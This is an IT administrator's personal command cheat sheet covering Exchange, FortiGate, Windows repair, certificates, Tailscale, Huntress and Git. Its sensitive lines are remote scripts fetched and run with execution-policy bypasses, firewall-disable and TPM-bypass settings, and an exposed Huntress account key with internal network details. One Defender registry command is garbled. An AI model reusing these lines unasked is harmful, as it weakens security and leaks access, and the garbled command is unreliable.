 Get-MailboxCalendarConfiguration -Identity SmallConferenceRoom@noveliron.com

Add Printers

#!ps

Add-Printer -ConnectionName "\\PS-FS-01\Canon Upstairs"

#!ps

Add-Printer -ConnectionName "\\PS-FS-01\Canon Downstairs"

Grant Mailbox access Exchange Online

#Get’s mailbox Permissions

Get-MailboxPermission -Identity "supplier"

#This example assigns the user Kevin Kelly Full Access permission to Terry Adams's mailbox.

Add-MailboxPermission -Identity "supplier" -User "Tammi Vetree" -AccessRights FullAccess -InheritanceType All

Get Distribution Group Members

Get-DistributionGroupMember -Identity "all-novel@noveliron.com" | Select-Object DisplayName,PrimarySmtpAddress | Export-Csv -Path "C:\all-novel-members.csv" -NoTypeInformation

Get-DistributionGroupMember -Identity "all-rose@rosesteelinc.com" | Select-Object DisplayName,PrimarySmtpAddress | Export-Csv -Path "C:\all-rose-members.csv" -NoTypeInformation

Installed Updates

wmic qfe list

Grab Sha256 hash

CertUtil -hashfile "C:\Program Files (x86)\Common Files\Aladdin Shared\HASP\hasplms.exe" SHA256

setting is overridden by a policy defined at a more specific scope

#Set execution Policy if you get errors due to scope

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope Process -Force

Find 10 Largest Files

can be used for quick deletions if a drive is maxed out

gci -r| sort -descending -property length | select -first 10 name, length, directory

List users with Archive Mailbox enabled M365

Get-Mailbox -ResultSize Unlimited -RecipientTypeDetails UserMailbox | Where-Object {$_.ArchiveStatus -eq "Active"} | Select DisplayName, ArchiveStatus

https://morgantechspace.com/2021/01/check-size-and-status-of-archive-mailbox-powershell.html#:~:text=We%20can%20use%20the%20Get,other%20mailbox%2Drelated%20statistics%20data.  

TLS issue with PS Scripts making Web Requests

# Force TLS 1.2 for older Windows versions

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

Get Connected Bluetooth devices
Get-PnpDevice -class Bluetooth | ? HardwareID -match 'DEV_' | Select *

RESOTECH

Github

Note: Testing for automating Onboarding/Offboarding and setting up standard Conditional Access Policies in M365. Google Workspaces offboarding with google takeout and sending it to an administrator’s google drive.

Github used for windows update powershell script in Private RESOTECH Github Repositories and version control via Github Desktop application. In the future look into learning git cli.

Formerly used this version control for Sysmon XML configuration file for compliance customers. Currently have a few powershell scripts uploaded there that need to be tested for automating certain workflows. Likely won’t need Conditional Access / MFA enforcement scripts due to Netlogic’s Baseline Builder

Black Magic aka Voodoo (DISM & SFC Commands)

Sometimes it works and other times it does nothing… Hit or miss. May run if device is in automatic startup repair boot loop

dism /online /cleanup-image /restorehealth

sfc /scannow

dism /online /cleanup-image /scanhealth

dism /online /cleanup-image /checkhealth

dism /online /cleanup-image /restorehealth

DISM /Online /Cleanup-Image /RestoreHealth /source:WIM:X:SourcesInstall.wim:1 /LimitAccess

DISM /Online /Cleanup-Image /RestoreHealth /Source:E:\Sources\install.wim

Get-WindowsImage -ImagePath "D:\sources\install.wim"

#Check Disk
chkdsk /f /r C:

#fix boot and rebuild BCD via CLI

exe /rebuildbcd

exe /fixmbr

exe /fixboot

#check OSDevicePartition

bcdedit /set {default} device partition=c:

bcdedit /set {default} osdevice partition=c:

#disable synthetic timers

bcdedit /set useplatformtick yes

#disable dynamic tick

Bcdedit /set disabledynamictick yes

Disable Hibernation

#disable

powercfg.exe /hibernate off

powercfg /hibernate off

#enable

powercfg.exe /hibernate on

Fast Startup

Powercfg -h off

Update GPO’s

gpupdate /force

Domain Time

tzutil /s "Eastern Standard Time"

Automate Windows Update Via GPO

Location of Powershell Script:

\\CKEL-FILE\Store\updateWindows.ps1

Create a scheduled task running as SYSTEM

Choose Daily, weekly, monthly parameters

Action choose a Program:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Add Arguments (optional) - This will be the location of the script via UNC path See CKEL lab for example

\\CKEL-FILE\Store\updateWindows.ps1

Get Network Connection Type

#Check if the network connection is public/private/domain type (for win defender)

Get-NetConnectionProfile

#Public/private/domain as options

Set-NetConnectionProfile -Name "NetworkName" -NetworkCategory Private

#change name

Set-NetConnectionProfile -Name "CurrentProfileName" -NewName "NewProfileName"

Set-NetConnectionProfile -Name "Network" -NetworkCategory 'DomainAuthenticated'

Legend:

Public

Private

DomainAuthenticated

Display GPO Policies and Mapped Drives

Run this as the user in question

gpresult /R

net use

In the future it would be worth testing clearing the kerberos tickets using "klist purge"

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/klist 

It appears group membership is being cached or is being delayed in some way and kerberos tickets seem like a logical place to start diagnosing

Installing apps on RDS

Put RDS into Install mode

change user /install

after installation return to execute mode

change user /execute

Update Checksums ArchLinux

updpkgsums

HyperV Extend Drive Space & Diskpart

HyperV: https://www.nakivo.com/blog/increase-disk-size-hyper-v-complete-guide/ 

DiskPart: https://www.lifewire.com/delete-windows-recovery-partition-4128723 

diskpart

list volume

#use list partition

list partition

select Partition 4

delete partition override

Check Free Disk Space macOS

df -h

Block Personal OneDrive Sign-in

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\OneDrive /v DisablePersonalSync /t REG_DWORD /d 1 /f

Enable Network Discovery

netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes

#disable

netsh advfirewall firewall set rule group=”Network Discovery” new enable=No

Query Local Administrators

net localgroup Administrators

Add/Delete Local Administrators

net localgroup users domainname\username /add

net localgroup users GIP\IQMS /add

net localgroup administrators [username] /delete

net localgroup administrators GIP\IQMS  /delete

Group Policy

gpresult /R

Batch Scripts

Office 365 Installation with a menu

@echo off

:menu

cls

echo.

echo Choose an option:

echo 1) Install Microsoft Office 64-bit

echo 2) Install Microsoft Office 32-bit

echo 3) Install Microsoft Access

echo 4) Remove Microsoft Office

echo.

set /p option=Enter your choice:

if %option% == 1 goto install64

if %option% == 2 goto install32

if %option% == 3 goto installAccess

if %option% == 4 goto remove with sara

:install64

echo Installing Microsoft Office 64-bit...

start /wait \\server\share\Office64.exe /quiet

goto end

:install32

echo Installing Microsoft Office 32-bit...

start /wait \\server\share\Office32.exe /quiet

goto end

:installAccess

echo Installing Microsoft Access...

start /wait \\server\share\Access.exe /quiet

goto end

:remove

echo Removing Microsoft Office using SARA recovery tool...

start /wait \\server\share\SARA.exe /quiet

goto end

:end

echo Installation completed.

pause

Backup Outlook files and autocomplete

@echo off

set source_folder=C:\users\*\Local\Microsoft\Outlook\RoamCache

set destination_folder=C:\Temp

echo Backing up Outlook PST files...

xcopy "C:\Users\%userprofile%\Documents\Outlook Files\*.pst" "%destination_folder%\Outlook PST Files" /s /c /y

echo Grabbing largest autocomplete stream .dat file from RoamCache directory...

for /f "tokens=2 delims= " %%a in ('dir /b /s /a-d "%source_folder%\*.dat" ^| sort /r') do (

  set largest=%%a

  goto endloop

)

:endloop

xcopy "%largest%" "%destination_folder%\Autocomplete Stream.dat" /y

echo Backup completed.

pause

Recognize Autocomplete Files

@echo off

set roamcache_folder=C:\users\*\Local\Microsoft\Outlook\RoamCache

echo Identifying old and recent autocomplete stream .dat files...

for /f "tokens=2,3 delims= " %%a in ('dir /b /s /a-d "%roamcache_folder%\*.dat" ^| sort /r /o:-d') do (

  set old=%%a

  set recent=%%b

  goto endloop

)

:endloop

echo Old autocomplete stream .dat file: %old%

echo Recent autocomplete stream .dat file: %recent%

pause

Fortigate

General Information

CKEL-40F

WAN: 32:85:f0:19:bf:28

LAN 10.3.0.1 - proxmox

VLAN3 10.3.3.1 - SYN

VLAN6 10.3.6.1 - CK

VLAN7 10.3.7.1 - CK_Wireless

VLAN9 10.3.9.1 - RESO

VLAN66 10.3.66.1 - Analog_Devices

VLAN69 10.3.69.1 - IOT Guest access plus TV’s/xbox/etc

OLD 40F WAN Mac: ac:71:2e:eb:70:b2

Fortigate CLI

Check resource usage

press M to sort by memory

diagnose sys top 5 30

 Continous Ping

# exe ping-options repeat-count 10000

# exe ping 8.8.8.8

Check the resource utilization on the FortiGate Cont.

diagnose hardware sysinfo memory

get system performance status

get system performance top

diagnose system top

Crashlog

 diagnose debug  crashlog read

Run the following packet sniffer in the CLI

# diagnose sniffer packet any host x.x.x.x and port 53

Set Mac Address on Interface

config sys int

edit <interface>

set macaddr <MAC address>

 end

Restart Routing Engine  

exec router restart

DHCP Option 43

Get controller IP converted to hex: https://tcpip.wtf/en/unifi-l3-adoption-with-dhcp-option-43-on-pfsense-mikrotik-and-others.htm 

https://help.ui.com/hc/en-us/articles/204909754-Remote-Adoption-Layer-3#7 

config system dhcp server

    edit 1

        config options

            edit 1

                set code 43

                set type hex

                set value 2b 1a 31 2e 32 2e 33 2e 34

end

Add a local dns entry that points unifi to your controller,  example:

unifi  →  104.200.30.137

Set the HTTPS certificate for GUI on CLI

If you get locked out of gui, etc:

config system global

show full | grep admin-server-cert

set admin-server-cert Fortinet_Factory

set admin-server-cert face_fortigategui

End

Full

OpenSSL Self Signed Certificate Setup for SSL Inspection

#navigate to windows desktop from WSL Linux server

cd /mnt/c/users/ckadmin/desktop/WVPTCerts

## Company Name: companyID

## Root CA Certificate (for deep Inspection)

# Generate root private key

openssl genrsa -aes256 -out companyID_root_private.key 2048

# Generate root CA certificate

#   Add to Windows Trusted Root Certificate Authority

#   Input Country, State, Org Name Only

openssl req -new -x509 -days 3650 -extensions v3_ca -key companyID_root_private.key -out companyID_root_ca.crt

## Service1

# Generate private key for service1

openssl genrsa -aes256 -out companyID_service1_private.key 2048

# Generate CSR using service1 private key

#   Skip "challenge password" and "an optional company name"

openssl req -new -key companyID_service1_private.key -out companyID_service1.csr

# Prep EXT File

#   Rename file

#   Delete the dns or ip entry as needed

#   Update the remaining entry to use service1 ip/hostname

# Generate certificate from service1 CSR using Root CA

openssl x509 -req -in companyID_service1.csr -CA companyID_root_ca.crt -CAkey companyID_root_private.key -CAcreateserial -out companyID_service1.crt -days 3650 -sha256 -extfile companyID_service1.ext

# Fortigate certificates can be imported with

# Import > Certificate > Import Certificate > Certificate (cert, key and password)

========== extfile==========

authorityKeyIdentifier=keyid,issuerbasicConstraints=CA:FALSE

keyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment

subjectAltName = @alt_names

[alt_names]

DNS.1 = vpn.domain.com

IP.1 = 123.123.1.1

=========================

Disable SIP ALG and SIP Session Helper

Step1

config system settings

set sip-helper disable

set sip-nat-trace disable

set default-voip-alg-mode kernel-helper-based

end

Step 2

config system session-helper

show

Here you will want to find the entry for SIP, this is typically 12 or 13 but it may differ depending on software version and model

delete 12

Alternatively use the entry you found in the previous step

end

Step 3

Enter the following commands in the CLI to disable RTP processing

config voip profile

edit default

config sip

set rtp disable

end

end

Restart IPS Engine

diag test app ipsmonitor 99

SSL VPN Setup

Video also on RESO-DT-CHRIS

https://hudu.resolvetech.biz/kba/fortigate-firewall-standardization-3b014387219f 

ResolveTech Help Page

• Provides contact support information
• help.resolvetech.biz/edit (This will allow you to edit pages for different clients)
• Identifier: https://help.resolvetech.biz/?c= 
• After the equal sign you’d input the client identifier. A few examples are…

• ironnTCsn5szwZaAjREvhQmHfTVTLXWRBuDzfx5LHLoJ
• nepcnTCsn5szwZaAjREvhQmHfTVTLXWRBuDzfx5LHLoJ
• plodSNxBJ53NpwT7GXTuPuvrPJynFn3rjjWqFR7a9havt56p67kaS38tmfvd
• PSIMnTCsn5szwZaAjREvhQmHfTVTLXWRBuDzfx5LHLoJ

• This page includes links to all of our cognito forms to capture more information for tickets in the interest of saving time
• Push out ResolveTech Help Shortcut via GPO
• Images can be uploaded to the site and it acts as a static HTML page with our generic Contact Support PDF also in there.
• See the previous clients for example, very easy to edit a page and add a form or add a update

https://help.resolvetech.biz/?c=ironnTCsn5szwZaAjREvhQmHfTVTLXWRBuDzfx5LHLoJ

https://help.resolvetech.biz/?c=nepcnTCsn5szwZaAjREvhQmHfTVTLXWRBuDzfx5LHLoJ

https://help.resolvetech.biz/?c=plodSNxBJ53NpwT7GXTuPuvrPJynFn3rjjWqFR7a9havt56p67kaS38tmfvd

https://help.resolvetech.biz/?c=PSIMnTCsn5szwZaAjREvhQmHfTVTLXWRBuDzfx5LHLoJ

NGINX

Test config

sudo nginx -t

Restart Service

sudo systemctl restart nginx

Use local directory for Scripts

pushd %~dp0

%~dp0

Only need pushd on network shares

WMIC set local admin password to never expire

WMIC USERACCOUNT WHERE Name='rtadmin' SET PasswordExpires=FALSE

WMIC USERACCOUNT WHERE Name='yahadmin' SET PasswordExpires=FALSE

Create Local Admin through ScreenConnect macOS

dscl . -create /Users/rtadmin

dscl . -create /Users/rtadmin UserShell /bin/bash

dscl . -create /Users/rtadmin RealName "RT Admin"

dscl . -create /Users/rtadmin UniqueID "510"

dscl . -create /Users/rtadmin PrimaryGroupID 20

dscl . -create /Users/rtadmin NFSHomeDirectory /Users/rtadmin

dscl . -passwd /Users/rtadmin passwordgoeshere

dscl . -append /Groups/admin GroupMembership rtadmin

Print Spooler Commands

net stop spooler

net start spooler

Add Local Administrator

This is for windows CLI

net user /add /y /fullname:"ResolveTech" rtadmin passwd

net localgroup administrators rtadmin /add

Duo bad timestamp error

#sync time server

w32tm /resync

Windows Boot information

systeminfo | find "System Boot Time"

Wasabi

access-key=

secret-key=

Office built-in updates

Run Command from Screen Connect

cd "C:\Program Files\Common Files\microsoft shared\ClickToRun" & OfficeC2RClient.exe /update user

Tailscale

Get version

tailscale version

Update

Tailscale update

Update the Tailscale client version to the latest version, or to a different version.

tailscale update [flags]

Available flags:

--dry-run Show what update would do, without performing the update and without prompting to start the update.

--track The track to check for updates, either “stable” or “unstable”. If not specified, the update uses the track currently in effect for the client.

--version An explicit version to use for the update or downgrade. You cannot specify both --track and --version.

--yes Perform the update without interactive prompts. Defaults to false.

If you downgrade to a version that does not have the tailscale update functionality, you won’t be able to run tailscale update to return to the prior version. You would need to perform an update without using the Tailscale CLI.

To determine the current version on a client, run tailscale version.

Examples:

Update to the latest version within your current track (stable or unstable, depending on what you’re running):

tailscale update

Update to the latest version within your current track without using interactive prompts:

tailscale update --yes

Update to Tailscale v1.34:

tailscale update --version=1.34.0

Update to the latest unstable version:

tailscale update --track=unstable

Turn On Auto Updates Linux

tailscale set --auto-update

https://tailscale.com/kb/1067/update?tab=linux 

Pihole override Local DNS

https://tailscale.com/kb/1114/pi-hole/ 

Loki-ts Exit Node

Tailscale is now overriding local dns and using local pihole

tailscale up --accept-routes=true --accept-dns=false --advertise-exit-node

Windows Defender Firewall

NetSh Advfirewall set allprofiles state on

NetSh Advfirewall set allprofiles state off

netsh firewall show state

Bitlocker

Example

manage-bde -lock X:

Disable EFS

fsutil behavior set disableencryption 1

Client GPO’s

Client GPO’s and various One Off GPO’s will go here.

Any scheduled task GPO will have the ps or batch script live in the GPO’s folder directory under Scripts

ScoutDNS

Scheduled Task

program/script: Powershell

Argument: -ep bypass -f \\Ckel-dc1\sysvol\cktech.org\Policies\{7202A61F-307B-4F28-BE57-817DD28B0BB7}\scoutinstall.ps1

Defender for EndPoint

Scheduled task. From defender portal → Settings → Endpoints → device management → Onboarding   you grab the OnboardingScript.cmd file from Group Policy deployment method.

Path to installer:  //FileShareLocation/WindowsDefenderATPOnboardingScript.cmd

Block OneDrive from Redirecting Documents, Downloads and Pictures Directories

Copy OneDrive Admx and adml files from a windows device with onedrive installed.

After that you want to create and link the gpo to the computers OU and from there you enable the following object:

Prevent users from moving their Windows known folders to OneDrive         Enabled

https://learn.microsoft.com/en-us/sharepoint/use-group-policy

Enable WSL, Hyper V, VMP

One Liner to enable Windows Sub System for Linux, Hyper V and Virtual Machine Platform on Windows systems:

dism.exe /online /enable-feature /featurename:Microsoft-Hyper-V-All /featurename:VirtualMachinePlatform /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart

HomeBrew MacOS

# Install Homebrew:

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install chrome

brew install --cask google-chrome

#run updates homebrew

brew update

#chrome update

brew upgrade --cask google-chrome

Keystone Hardware Wallet

Verify Hash of Update File

certutil -hashfile C:/users/chris/Downloads/M-12.0 SHA256

Keystone 3 Pro

certutil -hashfile C:\Users\Chris\Downloads\keystone3.bin  SHA256

Firmware Upgrade - Keystone Support

Metamask Integration

MetaMask - Keystone Support

Hidden Passphrase Wallet

Passphrase - Keystone Support

Huntress

Huntress managed security platform + agent for managing defender and ransomware canaries

https://support.huntress.io/hc/en-us/articles/4404004936339-Install-via-PowerShell 

Run This to install via PS

PS Command

powershell -executionpolicy bypass -f ./InstallHuntress.powershellv2.ps1 -acctkey 8aae0ac4a32d886a8a450ab639b80213 -orgkey reso -tags RESO-DT-CK -reregister -reinstall

Script Location

https://github.com/huntresslabs/deployment-scripts/blob/main/Powershell/InstallHuntress.powershellv2.ps1 

Enable Defender via Powershell

Set-MpPreference -DisableRealtimeMonitoring $false

Set-MpPreference -DisableIOAVProtection $false

New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "Real-Time Protection" -Force

New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 0 -PropertyType DWORD -Force

New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 0 -https://docs.google.com/document/d/1lgNeLhNfEcAtVS1rWsoE07bSD2feyw0pwIk2sWAc_BA/mobilebasicWORD -Force

New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 0 -PropertyType DWORD -Force

New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 0 -PropertyType DWORD -Force

start-service WinDefend

start-service WdNisSvc

https://support.huntress.io/hc/en-us/articles/4402989131283-Enabling-Microsoft-Defender-using-Powershell- 

Firewall Exceptions

Requires outbound traffic on 443 to communicate with:

• *.huntress.io
• *.huntresscdn.com
• huntress-installers.s3.amazonaws.com
• huntress-updates.s3.amazonaws.com
• huntress-uploads.s3.us-west-2.amazonaws.com
• huntress-user-uploads.s3.amazonaws.com
• huntress-rio.s3.amazonaws.com
• huntress-survey-results.s3.amazonaws.com
• huntress-*.s3.amazonaws.com
• notify.bugsnag.com (this is for our bug reporting software if an Agent has an issue communicating) (you may see it point to something like 6.205.186.35.bc.googleusercontent.com)
• update.huntress.io
• huntress.io
• eetee.huntress.io
• eetee.huntresscdn.com
• Huntresscdn.com

It's quite rare but occasionally you might run into issues where Huntress is "taking" ownership of a listening port which might interfere with another program (usually a hosting/dev app like Visual Studio/IIS/etc). These high numerical-value port's are randomized, temporary, and uncontrollable.

Powershell command

Get-NetTcpConnection | Select Local*,Remote*,State,@{Name="Process";Expression={(Get-Process -Id $_.OwningProcess).ProcessName}} | Where-Object{$_.Process -eq "HuntressAgent"}

macOS

sudo lsof -i -P | grep "Huntress"

Phonetic Alphabet

A Alpha

B Bravo

C Charlie

D Delta

E Echo

F Foxtrot

G Golf

H Hotel

I India

J Juliet

K Kilo

L Lima

M Mike

N November

O Oscar

P Papa

Q Quebec

R Romeo

S Sierra

T Tango

U Uniform

V Victor

W Whiskey

X X-ray

Y Yankee

Z Zulu

Nginx

 Config Changes

sudo docker exec nginx-nginx-1 nginx -t

sudo docker exec nginx-nginx-1 nginx -s reload

Windows 11 Req Bypass

Computer\HKEY_LOCAL_MACHINE\SYSTEM\Setup

Create new key called “LabConfig”  

New 32 bit dword

BypassTPMCheck  set “1”

BypassSecureBootCheck  set to “1”

Computer\HKEY_LOCAL_MACHINE\SYSTEM\Setup\MoSetup

New dword 32 Bit

AllowUpgradesWithUnsupportedTPMOrCPU  set to “1”

https://github.com/AveYo/MediaCreationTool.bat/blob/main/bypass11/Skip_TPM_Check_on_Dynamic_Update.cmd 

Mozilla Firefox Wrong Language Fix

winget install --id Mozilla.Firefox --exact --locale en-US --force --scope machine --source winget --silent --accept-package-agreements --accept-source-agreements --disable-interactivity

https://www.reddit.com/r/firefox/comments/1ap1td5/firefox_switching_to_czech/ 

macOS Time Fix

sudo sntp -sS pool.ntp.org

Max ShadowCopies

https://learn.microsoft.com/en-us/windows/win32/backup/registry-keys-for-backup-and-restore?redirectedfrom=MSDN#maxshadowcopies 

Take Ownership of Folder in File Share

takeown /f "\\IRON-FILE1\Maint\Shop Maintenance\shipping over head doors" /r /d Y

icacls "\\IRON-FILE1\Maint\Shop Maintenance\shipping over head doors" /grant Administrators:F /t

Powershell IF CMD Prompt Fails

takeown /f "\\IRON-FILE1\Maint\Shop Maintenance\shipping over head doors" /r /d Y

icacls "\\IRON-FILE1\Maint\Shop Maintenance\shipping over head doors" /grant Administrators:F /t

Disable NVIDIA Ansel

dir "$env:systemroot\system32\driverstore\filerepository\*NvCameraEnable.exe" -rec |% {& "$_" off}

dir "$env:programfiles\nvidia corporation\*NvCameraEnable.exe" -rec |% {& "$_" off}  

Disable Network from FIle Explorer

Key Location:

HKEY_CLASSES_ROOT\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder

Backup the shellfolder → export

Right click and choose permissions

Make sure user/system has Full control

Change the attributes value from “b0040064” to “b0940064”

Restart computer

The network explorer option with network devices should now be hidden. To undo this change simply set it back to the original value and reboot!

https://www.youtube.com/watch?v=jQ83RU6SFm4 

Veeam Backup and Replication

NFS Share Path Format for Backup Repository

10.3.3.10:/VEEAM

Verify Domain Trust

Verify Domain

nltest /sc_verify:domainname

verify with Domain controller

netdom verify Computername

Verify PSO has been applied

Fine-Grained Password Policies (FGPP)

If your goal is to have different password policies for specific users or groups (like your Back Office group), it's recommended to use Fine-Grained Password Policies, which are managed through Active Directory Administrative Center or PowerShell.

FGPP allows you to set password policies based on security groups, rather than applying GPOs to OUs, which won't work for password policy changes.

Get-ADFineGrainedPasswordPolicy -Filter * | Where-Object {$_.appliesto -like '*BackOfficeUsers_PolicyGroup*'}

Update Powerfab

Powershell.exe -EP Unrestricted iwr "https://raw.githubusercontent.com/christopherkelley89/TeklaUpdate/refs/heads/main/powerfabGO.ps1" -o powerfab.ps1";.\powerfab.ps1

ACME.SH

Azure stuff: https://github.com/acmesh-official/acme.sh/wiki/How-to-use-Azure-DNS 

Set Issuer

acme.sh --issue --dns dns_azure -d resolvetech.biz -d '*.resolvetech.biz' --force --staging --debug

Issue Certificate Command

acme.sh --issue --dns dns_azure -d "*.resolvetech.biz" --force

LE Issuance via CF

Staging

• Run this first, you can test in staging as long as you want and make sure DNS Challenge is tight. IN PRODUCTION ITS RATE LIMITED. I.e. you’ll be unable to renew your cert for 18hrs. Test in staging and switch back.

Set to Staging to test

acme.sh --set-default-ca --server https://acme-staging-v02.api.letsencrypt.org/directory

acme.sh --issue --server https://acme-staging-v02.api.letsencrypt.org/directory --dns dns_cf -d cktech.org -d *.cktech.org --keylength ec-256

acme.sh --issue --server https://acme-staging-v02.api.letsencrypt.org/directory --dns dns_cf -d cktechlab.com -d *.cktechlab.com --keylength ec-256

Production Issuance

set back to prod

acme.sh --set-default-ca --server https://acme-v02.api.letsencrypt.org/directory

acme.sh --issue --dns dns_cf -d cktechlab.com -d *.cktechlab.com --keylength ec-256 --force

verify issuance

ls ~/.acme.sh/cktechlab.com_ecc/

 Install the Certificate

acme.sh --install-cert -d cktechlab.com \

--cert-file /etc/nginx/certs/cktechlab.com/cert.pem \

--key-file /etc/nginx/certs/cktechlab.com/privkey.pem \

--fullchain-file /etc/nginx/certs/cktechlab.com/fullchain.pem \

--reloadcmd "nginx -s reload"

acme.sh --list

Set Renewal Cron Job

acme.sh --install-cronjob

Disable ipv6 On Windows 10/11 workstations

Get current settings
Get-NetAdapterBinding -ComponentID ms_tcpip6

Disable
Disable-NetAdapterBinding -Name "Ethernet" -ComponentID ms_tcpip6

Re-enable
Enable-NetAdapterBinding -Name "Ethernet" -ComponentID ms_tcpip6

Veeam

Veeam Ports used for Backup Infrastructure components

TCP port 10001-1030

TCP/UDP port 135

TCP port 443

Ports 137-13

TCP port 6160

TCP port 9392

Port 5432

Port 1433

https://helpcenter.veeam.com/docs/backup/vsphere/used_ports.html?ver=12

0 

KDE Wayland monitor fix

Lives here:

~/.config/plasma-workspace/env/rog-monitor-fix.sh

#!/bin/bash

# Wait a moment after login (Wayland delay fix)

sleep 2

# Assign outputs by refresh rate (because DP IDs can change)

output360=$(kscreen-doctor --json | jq -r '.outputs[] | select(.connected == true and .modes[]?.name == "2560x1440@360") | .id')

output240=$(kscreen-doctor --json | jq -r '.outputs[] | select(.connected == true and .modes[]?.name == "2560x1440@240") | .id')

output60=$(kscreen-doctor --json | jq -r '.outputs[] | select(.connected == true and .modes[]?.name == "2560x1440@60") | .id')

# Apply layout

kscreen-doctor output.${output360}.mode.2560x1440@360 output.${output360}.position.0,0 output.${output360}.primary

kscreen-doctor output.${output240}.mode.2560x1440@240 output.${output240}.position.2560,0

kscreen-doctor output.${output60}.mode.2560x1440@60 output.${output60}.position.5120,0

# Optional: Disable extra weird output if needed

# kscreen-doctor output.DP-5.disable

Git Commands

cd ~/arch

# Stage the new cheatsheet

git add git-cheatsheet.md

# Commit with a clear message

git commit -m "Add git-cheatsheet.md with beginner Git usage tips"

# Push to the remote main branch

git push origin main

Dotfile Changes

Copy to Directory

 cp ~/.bashrc ~/arch/dotfiles/

  cp ~/.bashrc ~/arch/dotfiles/

Push to Git

`cd ~/arch/dotfiles`

git add .

git commit -m "Update .zshrc and .bashrc with latest changes"

git push

Get-DiskImage -ImagePath "D:\Hyper-V\IRON-FILE1\iron-file1-e.vhdx"

handle "iron-file1-e.vhdx"

Dismount-DiskImage -ImagePath "D:\Hyper-V\IRON-FILE1\iron-file1-e.vhdx"

C:\HyperV\CKEL-WIN11-2\Virtual Hard Disks\CKEL-WIN11-2.vhdx

Mount-DiskImage -ImagePath "C:\HyperV\CKEL-WIN11-2\Virtual Hard Disks\CKEL-WIN11-2.vhdx"

GPG Key

Installation

Install GnuPG and pinentry

sudo pacman -S gnupg pinentry-qt

Set correct permissions for GPG directory

mkdir -p ~/.gnupg

chmod 700 ~/.gnupg

Set default gpg-agent options for passphrase caching and pinentry

cat > ~/.gnupg/gpg-agent.conf <<EOF

default-cache-ttl 600

max-cache-ttl 7200

enable-ssh-support

pinentry-program /usr/bin/pinentry-qt

==========================================

gpgconf --kill gpg-agent

gpgconf --launch gpg-agent

gpgconf --list-dirs agent-socket

# Generate a new GPG key

gpg --full-generate-key

List keys to verify creation

gpg --list-keys

Enable GPG agent in environment in ZSH example

echo 'export GPG_TTY=$(tty)' >> ~/.zshrc

echo 'gpgconf --launch gpg-agent' >> ~/.zshrc

source ~/.zshrc

Test GPG signing

echo "test" | gpg --clearsign

# Configure Git to use GPG key (replace YOURKEYID)

git config --global user.signingkey YOURKEYID

git config --global commit.gpgsign true

DNS-Queries

dig example.com

# Get short answer (just IPs)

dig +short example.com

# Query a specific nameserver

dig @1.1.1.1 example.com

# Query DNS-over-TLS endpoint (if setup locally with stubby/unbound)

dig +tls example.com

# Check MX records

dig example.com MX

# Check TXT records

dig example.com TXT

# DNSSEC validation check

dig +dnssec example.com

# Check NS delegation

dig example.com NS

# Reverse lookup IP to domain

dig -x 1.2.3.4

# Trace full DNS resolution path

dig +trace example.com

# Full TCP query (good for firewall testing)

dig +tcp example.com

# Query root servers directly

dig . NS